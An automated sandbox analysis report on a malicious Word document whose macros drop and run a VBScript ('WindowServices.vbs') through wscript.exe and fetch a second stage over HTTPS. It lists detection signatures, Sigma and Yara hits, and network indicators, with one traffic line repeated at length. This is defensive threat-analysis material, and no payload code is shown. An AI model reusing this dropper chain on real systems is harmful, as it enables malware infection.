Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5UnAIdF7m2.docx

Overview

General Information

Sample name:5UnAIdF7m2.docx
renamed because original name is a hash value
Original sample name:0b59afb80d97e62328ab8719df49c0c2e45c1ce243bc0b3299f97e2c01cf33f5.docx
Analysis ID:1590806
MD5:9b6d32a2049de15b7054cbdf1e603dbb
SHA1:1b46dce266ea31ba3365d9f6152d5fee68ae184f
SHA256:0b59afb80d97e62328ab8719df49c0c2e45c1ce243bc0b3299f97e2c01cf33f5
Tags:app8490744docxhko247blackuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Microsoft Office drops suspicious files
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which might only executes on specific systems (country or language check)
Document contains embedded VBA macros
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 2676 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • wscript.exe (PID: 7436 cmdline: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\up[1].txtMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000

System Summary

barindex
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 2676, TargetFilename: C:\Users\user\Documents\WindowServices.vbs
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2676, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , ProcessId: 7436, ProcessName: wscript.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2676, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , ProcessId: 7436, ProcessName: wscript.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.65.251.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7436, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49742
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2676, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" , ProcessId: 7436, ProcessName: wscript.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-14T15:42:10.130500+010020226401A Network Trojan was detected172.65.251.78443192.168.2.449742TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 5UnAIdF7m2.docxVirustotal: Detection: 50%Perma Link
Source: 5UnAIdF7m2.docxReversingLabs: Detection: 42%
Source: 5UnAIdF7m2.docxJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49742 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Documents\WindowServices.vbsJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
Source: global trafficDNS query: name: gitlab.com
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
